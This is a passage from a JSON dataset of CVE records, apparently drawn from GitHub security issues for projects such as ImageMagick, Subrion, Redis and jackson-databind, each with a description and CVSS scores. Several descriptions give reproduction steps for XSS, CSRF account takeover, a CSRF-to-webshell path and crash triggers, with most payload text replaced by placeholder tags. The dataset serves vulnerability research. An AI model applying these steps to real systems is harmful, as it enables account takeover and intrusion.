Payload is executed. FILETAG APITAG NUMBERTAG APITAG POST request URL, FILETAG with XSS payloads through vulnerable variable APITAG APITAG (also collection name has to be injected with any invalid symbols) FILETAG APITAG NUMBERTAG APITAG Reflected response for the vulnerable variable APITAG APITAG with XSS Payload is executed. APITAG NUMBERTAG APITAG Accessing the GET Request of the URL URLTAG \"> APITAG alert NUMBERTAG APITAG &random NUMBERTAG will execute XSS in victim\u2019s browser. FILETAG APITAG NUMBERTAG APITAG GET request URL, URLTAG \"> APITAG alert NUMBERTAG APITAG &random NUMBERTAG with XSS payload through path variable is vulnerable to Cross Site Scripting. FILETAG APITAG NUMBERTAG APITAG Accessing GET request is executing XSS payload through the vulnerable variable. APITAG Steps APITAG NUMBERTAG Logon into carbon application with given credentials (admin/admin in localhost NUMBERTAG Now, access the vulnerable GET & POST Request URL with payload inserted into the vulnerable variable NUMBERTAG SS will get executed in the user machine once the user clicks on the given vulnerable link with XSS Payloads for both GET & POST request. APITAG APITAG NUMBERTAG Discovered in WSO2 Data Analytics Server Product version NUMBERTAG Reported to EMAILTAG NUMBERTAG Got instant response from WSO2 security team acknowledging the Vulnerability NUMBERTAG Got mail confirming that NUMBERTAG st issue was the new one NUMBERTAG nd issue have been reported earlier & fixed NUMBERTAG Public patching was on progress NUMBERTAG Patched and also, gave credits on their pages NUMBERTAG URLTAG NUMBERTAG URLTAG NUMBERTAG Got Token of Appreciation along with a hard copy of an appreciation certificate. APITAG by: APITAG Sathish from APITAG Cyber Security Works Pvt Ltd APITAG",
  9304. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  9305. "severity": "MEDIUM",
  9306. "baseScore": 4.8,
  9307. "impactScore": 2.7,
  9308. "exploitabilityScore": 1.7
  9309. },
  9310. {
  9311. "CVE_ID": "CVE-2017-14684",
  9312. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/770",
  9313. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/770",
  9314. "Repo_new": "imagemagick/imagemagick",
  9315. "Issue_Created_At": "2017-09-21T09:06:39Z",
  9316. "description": "memory leak in APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG gcc NUMBERTAG crash link : FILETAG trigger command : ./magick convert APITAG /dev/null detail : APITAG APITAG PATHTAG ./magick convert APITAG /dev/null APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG d3ead NUMBERTAG in __interceptor_realloc ( PATHTAG NUMBERTAG f NUMBERTAG c7c7feb in APITAG APITAG NUMBERTAG f NUMBERTAG c7c NUMBERTAG f in APITAG APITAG NUMBERTAG f NUMBERTAG c8fe6bf in APITAG APITAG NUMBERTAG f NUMBERTAG cc NUMBERTAG c6 in APITAG APITAG NUMBERTAG f NUMBERTAG c5f NUMBERTAG dd in APITAG APITAG NUMBERTAG f NUMBERTAG c5f NUMBERTAG c4 in APITAG APITAG NUMBERTAG f NUMBERTAG bdae8be in APITAG APITAG NUMBERTAG f NUMBERTAG bf NUMBERTAG in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c8e in main APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s). APITAG APITAG APITAG Security Lab",
  9317. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9318. "severity": "MEDIUM",
  9319. "baseScore": 6.5,
  9320. "impactScore": 3.6,
  9321. "exploitabilityScore": 2.8
  9322. },
  9323. {
  9324. "CVE_ID": "CVE-2017-14731",
  9325. "Issue_Url_old": "https://github.com/libofx/libofx/issues/10",
  9326. "Issue_Url_new": "https://github.com/libofx/libofx/issues/10",
  9327. "Repo_new": "libofx/libofx",
  9328. "Issue_Created_At": "2017-09-25T16:21:00Z",
  9329. "description": "ofxdump heap buffer overflow PATHTAG APITAG const ). Hello, I found following heap based buffer overflow from ofxdump. Is this a valid finding and could you fix it, thanks? I am more than happy to continue fuzzing libofx to improve the librarys quality. You can create the reproducer with: ERRORTAG And run it with ofxdump: ERRORTAG",
  9330. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9331. "severity": "MEDIUM",
  9332. "baseScore": 6.5,
  9333. "impactScore": 3.6,
  9334. "exploitabilityScore": 2.8
  9335. },
  9336. {
  9337. "CVE_ID": "CVE-2017-14735",
  9338. "Issue_Url_old": "https://github.com/nahsra/antisamy/issues/10",
  9339. "Issue_Url_new": "https://github.com/nahsra/antisamy/issues/10",
  9340. "Repo_new": "nahsra/antisamy",
  9341. "Issue_Created_At": "2017-07-05T22:14:50Z",
  9342. "description": "Support HTML5. APITAG uses a deprecated FILETAG which does not understand newer HTML5 tags like APITAG URLTAG . While this is a minor issue, it also does not understand newer HTML5 entities like \"&colon;\" or \"&lpar;\". This leads to a security vulnerability where the following text does not get cleaned: APITAG",
  9343. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  9344. "severity": "MEDIUM",
  9345. "baseScore": 6.1,
  9346. "impactScore": 2.7,
  9347. "exploitabilityScore": 2.8
  9348. },
  9349. {
  9350. "CVE_ID": "CVE-2017-14737",
  9351. "Issue_Url_old": "https://github.com/randombit/botan/issues/1222",
  9352. "Issue_Url_new": "https://github.com/randombit/botan/issues/1222",
  9353. "Repo_new": "randombit/botan",
  9354. "Issue_Created_At": "2017-09-25T16:11:07Z",
  9355. "description": "Investigate RSA side channel from Usenix Security. Looking through papers from this years Usenix Security I come across an interesting one on identifying cache based timing channels. URLTAG Hm I wonder what bugs they found... from the abstract APITAG we have successfully discovered previously unknown issues in two widely used cryptosystems, APITAG and Botan.\" well then! They analyze NUMBERTAG but the paper mentions \"we notice that this vulnerability affects several other versions of Botan, including NUMBERTAG and NUMBERTAG and so presumably NUMBERTAG also). Haven't read the paper carefully enough to understand the issue yet but hopefully this can be addressed in time for NUMBERTAG FTR I never received any contact about this ... shrug",
  9356. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  9357. "severity": "MEDIUM",
  9358. "baseScore": 5.5,
  9359. "impactScore": 3.6,
  9360. "exploitabilityScore": 1.8
  9361. },
  9362. {
  9363. "CVE_ID": "CVE-2017-14739",
  9364. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/780",
  9365. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/780",
  9366. "Repo_new": "imagemagick/imagemagick",
  9367. "Issue_Created_At": "2017-09-25T08:25:56Z",
  9368. "description": "Null Pointer Dereference at APITAG of APITAG Hi all, Another potential NPD at APITAG in APITAG , and there is no null check after this acquiring. It could lead to denial of service when out of memory occurs. This seems a similar case of URLTAG ERRORTAG Regards, Alex, APITAG Inc.",
  9369. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9370. "severity": "HIGH",
  9371. "baseScore": 7.5,
  9372. "impactScore": 3.6,
  9373. "exploitabilityScore": 3.9
  9374. },
  9375. {
  9376. "CVE_ID": "CVE-2017-14741",
  9377. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/771",
  9378. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/771",
  9379. "Repo_new": "imagemagick/imagemagick",
  9380. "Issue_Created_At": "2017-09-21T09:07:05Z",
  9381. "description": "endless loop in APITAG Version: APITAG NUMBERTAG I add a crafted font in PATHTAG APITAG and then run magick background lightblue fill blue font test size NUMBERTAG caption:'hello world' FILETAG magick will always occupy NUMBERTAG CPU. After I took a look, it maybe enter a endless loop in APITAG you can get the font from FILETAG",
  9382. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9383. "severity": "MEDIUM",
  9384. "baseScore": 6.5,
  9385. "impactScore": 3.6,
  9386. "exploitabilityScore": 2.8
  9387. },
  9388. {
  9389. "CVE_ID": "CVE-2017-14749",
  9390. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/2008",
  9391. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/2008",
  9392. "Repo_new": "jerryscript-project/jerryscript",
  9393. "Issue_Created_At": "2017-09-07T07:48:07Z",
  9394. "description": "Security: NULL word of APITAG lead to heap memory corruption results in OOB write.. APITAG and Crash in release NUMBERTAG FILETAG is as follows(hex displayed): APITAG Among the first string, there is a ' NUMBERTAG a). This byte could be replaced by ' NUMBERTAG d) or other bytes. And this kind of bytes makes the generated byte code contains an NULL word NUMBERTAG which lead to a crash as the following stack trace shows: ERRORTAG Root cause When processing the strings, the generated byte code are as follows: CODETAG The NULL word in NUMBERTAG is one of the APITAG compressed pointer. When bytecode is executed, the reference of the literal add NUMBERTAG while APITAG was overwritten because of the compressed pointer. Twice as it was referenced so the field was added up to NUMBERTAG This makes the index of the free chunk lists corrupts. Potential Risks With the heap memory corruption the free chunk lists could be faked. Potentially there exists an local write primitive in memory. If jerry is embedded in some host and could execute js, this vulnerability could result in remote code execution. Fix Suggestion Check code in bytecode generation: the failed literal's compressed pointer should not be NULL word.",
  9395. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9396. "severity": "HIGH",
  9397. "baseScore": 7.8,
  9398. "impactScore": 5.9,
  9399. "exploitabilityScore": 1.8
  9400. },
  9401. {
  9402. "CVE_ID": "CVE-2017-14868",
  9403. "Issue_Url_old": "https://github.com/restlet/restlet-framework-java/issues/1286",
  9404. "Issue_Url_new": "https://github.com/restlet/restlet-framework-java/issues/1286",
  9405. "Repo_new": "restlet/restlet-framework-java",
  9406. "Issue_Created_At": "2017-09-27T14:33:06Z",
  9407. "description": "XXE security issue using the XML provider. As reported by one of our users: ERRORTAG",
  9408. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  9409. "severity": "HIGH",
  9410. "baseScore": 7.5,
  9411. "impactScore": 3.6,
  9412. "exploitabilityScore": 3.9
  9413. },
  9414. {
  9415. "CVE_ID": "CVE-2017-14957",
  9416. "Issue_Url_old": "https://github.com/BlogoText/blogotext/issues/318",
  9417. "Issue_Url_new": "https://github.com/blogotext/blogotext/issues/318",
  9418. "Repo_new": "blogotext/blogotext",
  9419. "Issue_Created_At": "2017-09-14T18:21:30Z",
  9420. "description": "Contact for security issue. Hi, I've found a serious security issue in APITAG NUMBERTAG MENTIONTAG How can I contact (email) you privately?",
  9421. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  9422. "severity": "MEDIUM",
  9423. "baseScore": 6.1,
  9424. "impactScore": 2.7,
  9425. "exploitabilityScore": 2.8
  9426. },
  9427. {
  9428. "CVE_ID": "CVE-2017-14981",
  9429. "Issue_Url_old": "https://github.com/atutor/ATutor/issues/135",
  9430. "Issue_Url_new": "https://github.com/atutor/atutor/issues/135",
  9431. "Repo_new": "atutor/atutor",
  9432. "Issue_Created_At": "2017-09-30T09:01:50Z",
  9433. "description": "APITAG Cross Site Scripting (XSS) . Product: APITAG Download: URLTAG Vunlerable Version NUMBERTAG and probably prior Tested Version NUMBERTAG Author: APITAG of Venustech Advisory Details: Cross Site Scripting (XSS) were discovered APITAG NUMBERTAG which can be exploited to execute arbitrary JS code. The parameter \"url\" in the file PATHTAG is unsafe, we can bypass the XSS filter.An attacker could execute arbitrary JS code in a browser in the context of the vulnerable website. The exploitation examples below use the APITAG APITAG function to see a pop up messagebox: the poc is : url= APITAG . APITAG",
  9434. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  9435. "severity": "MEDIUM",
  9436. "baseScore": 5.4,
  9437. "impactScore": 2.7,
  9438. "exploitabilityScore": 2.3
  9439. },
  9440. {
  9441. "CVE_ID": "CVE-2017-14988",
  9442. "Issue_Url_old": "https://github.com/openexr/openexr/issues/248",
  9443. "Issue_Url_new": "https://github.com/academysoftwarefoundation/openexr/issues/248",
  9444. "Repo_new": "academysoftwarefoundation/openexr",
  9445. "Issue_Created_At": "2017-09-27T02:45:31Z",
  9446. "description": "DOS bug while reading attributes in Header::readfrom. I use APITAG to convert exr image, and it report allocate memory failure. After took a look, APITAG calls APITAG to open exr file, this function only takes filename as argument, so I think it is a openexr bug. You can get the POC file from FILETAG and run : magick test.exr FILETAG ERRORTAG",
  9447. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9448. "severity": "MEDIUM",
  9449. "baseScore": 5.5,
  9450. "impactScore": 3.6,
  9451. "exploitabilityScore": 1.8
  9452. },
  9453. {
  9454. "CVE_ID": "CVE-2017-14989",
  9455. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/781",
  9456. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/781",
  9457. "Repo_new": "imagemagick/imagemagick",
  9458. "Issue_Created_At": "2017-09-25T10:57:05Z",
  9459. "description": "heap use after free in APITAG Version : APITAG NUMBERTAG Q NUMBERTAG FILETAG In order to reproduce this bug, need to build APITAG and Freetype2 with ASAN. Add a crafted font in PATHTAG ''' APITAG ''' The crafted font file : FILETAG After have added the crafted font, run : magick background lightblue fill blue font test size NUMBERTAG caption:hello world FILETAG ASAN would report NUMBERTAG ERROR: APITAG heap use after free on address NUMBERTAG a0 at pc NUMBERTAG f NUMBERTAG ab1cc NUMBERTAG bp NUMBERTAG ffd NUMBERTAG c NUMBERTAG sp NUMBERTAG ffd NUMBERTAG c NUMBERTAG READ of size NUMBERTAG at NUMBERTAG a0 thread T NUMBERTAG f NUMBERTAG ab1cc NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG d4c in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG aa NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5cad NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf NUMBERTAG ad9 in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf8a1fc in APITAG PATHTAG NUMBERTAG f NUMBERTAG abe NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG abe NUMBERTAG e0 in APITAG PATHTAG NUMBERTAG f NUMBERTAG abeb7ad7 in APITAG PATHTAG NUMBERTAG ee NUMBERTAG d in APITAG PATHTAG NUMBERTAG ee NUMBERTAG d in main PATHTAG NUMBERTAG f NUMBERTAG a NUMBERTAG f NUMBERTAG f in __libc_start_main PATHTAG NUMBERTAG a2d8 in _start ( PATHTAG NUMBERTAG a0 is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG c0c8b in __interceptor_free PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG ad0 in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG aa NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5cad NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf NUMBERTAG ad9 in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf8a1fc in APITAG PATHTAG NUMBERTAG f NUMBERTAG abe NUMBERTAG in APITAG PATHTAG previously allocated by thread T0 here NUMBERTAG c0fdc in __interceptor_malloc PATHTAG NUMBERTAG f NUMBERTAG ab NUMBERTAG e2 in ft_mem_qalloc PATHTAG NUMBERTAG f NUMBERTAG ab NUMBERTAG e2 in ft_mem_alloc PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG aa NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac NUMBERTAG ea NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5c NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG ac5cad NUMBERTAG in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf NUMBERTAG ad9 in APITAG PATHTAG NUMBERTAG f NUMBERTAG abf8a1fc in APITAG PATHTAG NUMBERTAG f NUMBERTAG abe NUMBERTAG in APITAG PATHTAG ''' After I took a look at the code, I think it maybe caused by calling APITAG multiple times. First when ''' APITAG if (last_glyph.id NUMBERTAG APITAG last_glyph=glyph; APITAG } ''' last_glyph is equal to glyph. And then, in some cases, it will call APITAG and APITAG both. Since last_glyph = glyph, the last call will trigger this bug. ''' if (last_glyph.id NUMBERTAG APITAG / Determine font metrics. / APITAG APITAG APITAG if (ft_status NUMBERTAG APITAG } '''",
  9460. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  9461. "severity": "MEDIUM",
  9462. "baseScore": 6.5,
  9463. "impactScore": 3.6,
  9464. "exploitabilityScore": 2.8
  9465. },
  9466. {
  9467. "CVE_ID": "CVE-2017-14992",
  9468. "Issue_Url_old": "https://github.com/moby/moby/issues/35075",
  9469. "Issue_Url_new": "https://github.com/moby/moby/issues/35075",
  9470. "Repo_new": "moby/moby",
  9471. "Issue_Created_At": "2017-10-03T21:29:36Z",
  9472. "description": "tar split does not read block by block nor validate tar format. Problem URLTAG This line can read any number of APITAG s at the end of an archive, potentially taking up all the space in RAM. Reproductible To reproduce, compress a high amount of NUMBERTAG s and push&pull as an image. Solution We should validate the integrity of tar headers and read block by block instead. Additional Comment MENTIONTAG also mentioned that URLTAG might be an issue if one can construct a very big tar header for a single entry. TBD /cc MENTIONTAG MENTIONTAG",
  9473. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  9474. "severity": "MEDIUM",
  9475. "baseScore": 6.5,
  9476. "impactScore": 3.6,
  9477. "exploitabilityScore": 2.8
  9478. },
  9479. {
  9480. "CVE_ID": "CVE-2017-15010",
  9481. "Issue_Url_old": "https://github.com/salesforce/tough-cookie/issues/92",
  9482. "Issue_Url_new": "https://github.com/salesforce/tough-cookie/issues/92",
  9483. "Repo_new": "salesforce/tough-cookie",
  9484. "Issue_Created_At": "2017-09-05T12:43:35Z",
  9485. "description": "Vulnerable Regular Expression. The following regular expression used for parsing the cookie is vulnerable to APITAG APITAG The slowdown is moderately low: for NUMBERTAG characters around NUMBERTAG seconds matching time. However, I would still suggest one of the following: remove the regex, anchor the regex, limit the number of characters that can be matched by the repetition, limit the input size. I noticed there is another bug report regarding the correctness of this regular expression. If needed, I can provide an actual example showing the slowdown.",
  9486. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  9487. "severity": "HIGH",
  9488. "baseScore": 7.5,
  9489. "impactScore": 3.6,
  9490. "exploitabilityScore": 3.9
  9491. },
  9492. {
  9493. "CVE_ID": "CVE-2017-15015",
  9494. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/724",
  9495. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/724",
  9496. "Repo_new": "imagemagick/imagemagick",
  9497. "Issue_Created_At": "2017-09-03T15:05:49Z",
  9498. "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so ( messages)[length+offset] will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
  9499. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9500. "severity": "HIGH",
  9501. "baseScore": 8.8,
  9502. "impactScore": 5.9,
  9503. "exploitabilityScore": 2.8
  9504. },
  9505. {
  9506. "CVE_ID": "CVE-2017-15016",
  9507. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/725",
  9508. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/725",
  9509. "Repo_new": "imagemagick/imagemagick",
  9510. "Issue_Created_At": "2017-09-03T15:06:02Z",
  9511. "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so ((PAPMHEADER) APITAG APITAG will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
  9512. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9513. "severity": "HIGH",
  9514. "baseScore": 8.8,
  9515. "impactScore": 5.9,
  9516. "exploitabilityScore": 2.8
  9517. },
  9518. {
  9519. "CVE_ID": "CVE-2017-15017",
  9520. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/723",
  9521. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/723",
  9522. "Repo_new": "imagemagick/imagemagick",
  9523. "Issue_Created_At": "2017-09-03T15:05:37Z",
  9524. "description": "Null Pointer Dereference in APITAG APITAG NUMBERTAG Q NUMBERTAG Here is the critical code: CODETAG APITAG may return NULL, so mng_info >global_plte[i].xxx will Dereference Null pointer to cause memory error. Credit: APITAG of Venustech",
  9525. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9526. "severity": "HIGH",
  9527. "baseScore": 8.8,
  9528. "impactScore": 5.9,
  9529. "exploitabilityScore": 2.8
  9530. },
  9531. {
  9532. "CVE_ID": "CVE-2017-15041",
  9533. "Issue_Url_old": "https://github.com/golang/go/issues/22125",
  9534. "Issue_Url_new": "https://github.com/golang/go/issues/22125",
  9535. "Repo_new": "golang/go",
  9536. "Issue_Created_At": "2017-10-04T06:06:01Z",
  9537. "description": "placeholder for security issue. Placeholder for security release on October NUMBERTAG Go NUMBERTAG and Go NUMBERTAG",
  9538. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9539. "severity": "CRITICAL",
  9540. "baseScore": 9.8,
  9541. "impactScore": 5.9,
  9542. "exploitabilityScore": 3.9
  9543. },
  9544. {
  9545. "CVE_ID": "CVE-2017-15042",
  9546. "Issue_Url_old": "https://github.com/golang/go/issues/22134",
  9547. "Issue_Url_new": "https://github.com/golang/go/issues/22134",
  9548. "Repo_new": "golang/go",
  9549. "Issue_Created_At": "2017-10-04T17:36:00Z",
  9550. "description": "placeholder for security issue.",
  9551. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  9552. "severity": "MEDIUM",
  9553. "baseScore": 5.9,
  9554. "impactScore": 3.6,
  9555. "exploitabilityScore": 2.2
  9556. },
  9557. {
  9558. "CVE_ID": "CVE-2017-15047",
  9559. "Issue_Url_old": "https://github.com/antirez/redis/issues/4278",
  9560. "Issue_Url_new": "https://github.com/redis/redis/issues/4278",
  9561. "Repo_new": "redis/redis",
  9562. "Issue_Created_At": "2017-08-31T19:06:03Z",
  9563. "description": "Potential Buffer Overflow from user controllable Array Index value. The APITAG function within PATHTAG seems to allow for a Buffer Overflow vulnerability leading from an array index being set from user controllable input. The vulnerable code is: CODETAG As we can see, the _slot_ variable is receiving the output of atoi being run here: APITAG Now, _argv[j]_ is basically the arguments of each line (stored in APITAG being put into the array using _sdssplitargs_ for further processing. The slot value, after being extracted is then used in the _if else_ block which controls the slot migration, i.e. APITAG and APITAG . It is safe to assume that a user won't try to put in invalid slot numbers in the cluster configuration file. However, an attacker with limited access to the machine would be able to trigger memory corruption issues or even potentially execute code by forcing an Array Index out of Bounds exception from happening due to invalid values of _slot_. There should be some validation on the value of _slot_ and the maximum length of the _migrating_slots_to_ and _migrating_slots_from_ arrays.",
  9564. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9565. "severity": "CRITICAL",
  9566. "baseScore": 9.8,
  9567. "impactScore": 5.9,
  9568. "exploitabilityScore": 3.9
  9569. },
  9570. {
  9571. "CVE_ID": "CVE-2017-15056",
  9572. "Issue_Url_old": "https://github.com/upx/upx/issues/128",
  9573. "Issue_Url_new": "https://github.com/upx/upx/issues/128",
  9574. "Repo_new": "upx/upx",
  9575. "Issue_Created_At": "2017-10-02T06:31:37Z",
  9576. "description": "Invalid Pointer Read in APITAG An Invalid Pointer Read occur in APITAG while decompressing a crafted binary. ASAN reports: ERRORTAG FILETAG",
  9577. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9578. "severity": "HIGH",
  9579. "baseScore": 7.8,
  9580. "impactScore": 5.9,
  9581. "exploitabilityScore": 1.8
  9582. },
  9583. {
  9584. "CVE_ID": "CVE-2017-15063",
  9585. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/547",
  9586. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/547",
  9587. "Repo_new": "intelliants/subrion",
  9588. "Issue_Created_At": "2017-10-01T07:56:36Z",
  9589. "description": "CSRF Token Bypass because of code logic error.. There are CSRF vulnerabilities At Subrion CMS because of code logic APITAG the check function is set in the program, its location does not appear to be correct in FILETAG . APITAG APITAG should be executed first and then APITAG For example,we can use this vulnerability to get a APITAG create a html page which can simulate the function of the SQL tool. CODETAG When the administrator visit the page, even though it will echo APITAG treated as a potential CSRF APITAG SQL statement has been executed and the webshell has been created.",
  9590. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9591. "severity": "HIGH",
  9592. "baseScore": 8.8,
  9593. "impactScore": 5.9,
  9594. "exploitabilityScore": 2.8
  9595. },
  9596. {
  9597. "CVE_ID": "CVE-2017-15063",
  9598. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/570",
  9599. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/570",
  9600. "Repo_new": "intelliants/subrion",
  9601. "Issue_Created_At": "2017-10-15T03:58:59Z",
  9602. "description": "CSRF Account Take Over Possible. Affected Software Subrion Open Source CMS FILETAG URLTAG Version Tested NUMBERTAG Latest Stable version June NUMBERTAG URLTAG Environment Tested Ubuntu NUMBERTAG PHP NUMBERTAG ulnerability and Impact Vulnerability: Cross Site Request Forgery CSRF attack on profile upload Impact: Account Take Over The changing of password requires the knowledge of the current password, this prevents simplified account take over. It is still possible to perform an account take over through CSRF attack as it is possible to change the email of the user without knowing the current password. By changing the email, the attacker is able to perform a account reset :) Vulnerability Description: It is discovered that state changing requests, such as updating of profile: APITAG contains a parameter __st that holds a unqiue value to act as a CSRF prevention However this value is not validated on the server side and thus it is possible to perform a CSRF attack. Steps to Reproduce: Craft a .html file that contains the CSRF attack POST request. Please change the PATHTAG to your own hosted IP address. The value of fullname does not matter. The important parameter here is email. Please note that for demonstration purpose, clicking on APITAG request\" is required. A real attack does not require a victim to click on any buttons, as it is possible to auto submit POST request when a page is loaded ERRORTAG NUMBERTAG Authenticate into Subrion CMS. Browse to your profile page NUMBERTAG On another tab, visit this crafted .html and click Submit Request NUMBERTAG Refresh your profile page and your email will be hijacked Refer to the screenshot attached. The entire __st is removed and the state changing request to update the profile still works. APITAG Recommendation: Validate the CSRF token Consider implementing changing of email to require the current password URLTAG",
  9603. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  9604. "severity": "HIGH",
  9605. "baseScore": 8.8,
  9606. "impactScore": 5.9,
  9607. "exploitabilityScore": 2.8
  9608. },
  9609. {
  9610. "CVE_ID": "CVE-2017-15095",
  9611. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1737",
  9612. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1737",
  9613. "Repo_new": "fasterxml/jackson-databind",
  9614. "Issue_Created_At": "2017-08-17T21:24:26Z",
  9615. "description": "Block more JDK types from polymorphic deserialization. (note: follow up for NUMBERTAG After initial set of types blocked new reports have arrived for more black listing. Although eventual approach is likely to rely separate module (for more timely updates and wider version coverage), at this point addition in databind is needed. I will update specific list of additions once complete and release is out. Target versions are APITAG and APITAG it is possible to backport in NUMBERTAG and even NUMBERTAG but there is diminishing return on effort with those versions so it will not happen unless specifically requested (I'm happy to merge PRs).",
  9616. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  9617. "severity": "CRITICAL",
  9618. "baseScore": 9.8,
  9619. "impactScore": 5.9,
  9620. "exploitabilityScore": 3.9
  9621. },
  9622. {
  9623. "CVE_ID": "CVE-2017-15095",
  9624. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/1680",
  9625. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/1680",
  9626. "Repo_new": "fasterxml/jackson-databind",
  9627. "Issue_Created_At": "2017-06-27T04:56:59Z",
